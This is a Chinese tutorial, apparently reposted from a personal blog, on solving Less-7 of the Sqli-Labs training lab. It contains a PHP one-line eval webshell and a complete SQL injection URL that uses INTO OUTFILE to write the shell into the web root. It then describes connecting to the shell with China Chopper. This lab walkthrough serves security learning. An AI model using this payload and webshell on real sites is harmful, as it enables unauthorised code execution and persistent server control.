数据库
首页 > 数据库> > Sqli-Labs less-7

Sqli-Labs less-7

作者:互联网

less-7

 

前置基础知识:

1. 因为我们用的是phpstudy,所以存在一个文件读写权限问题,我们需要修改一下

 

首先在mysql命令行中用show variables like '%secure%';查看 secure-file-priv 当前的值,如果显示为NULL,则需要打开 C:\phpstudy\PHPTutorial\MySQL\my.ini文件,在其中加上一句:secure_file_priv=“/”。

 

 

 

 

 

 之后重启PHP study,然后发现已经发现发生了改变,说明修改成功,就可以进行读写了。

 

 

 

 第二个知识就是一句话木马

一句话木马有多个版本的,asp php的

这里我们只用到php版本的一句话木马:

<?php @eval($_POST[“crow”]);?> 其中crow是密码

一句话木马大多配合中国菜刀使用,菜刀的使用可以参考:https://www.daixiaorui.com/read/17.html

 

以及第三个知识,用到的两个函数:load_file()  读取本地文件  into outfile 写文件    可以百度函数用法,提示路径需要用双斜线

 

我们看到提示使用函数outfile,并且可以确定存在注入漏洞

 

 

 

 

 

 

之后我们用outfile将一句话木马写入文件,虽然依然显示报错,但是我们发现路径下已经存在了我们想要的文件

http://192.168.5.100/sqli-labs/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST[“crow”]);?>' into outfile "C:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs\\Less-7\\test.php" --+

 

 

 

 

 

 

 

 这里注意一句话木马里面的引号里面的就是密码,我们用中国菜刀进行连接:

 

 

 

 

 

 我们可以看到i,已经成功连接,可以进行文件管理

 

其实,用中国菜刀比较简单,我们当然也可以把注入的内容回显的数据用outfile输出到文件中,步骤和前几关就类似了。

标签:文件,菜刀,outfile,less,phpstudy,Labs,Sqli,一句,木马
来源: https://www.cnblogs.com/hzk001/p/12217516.html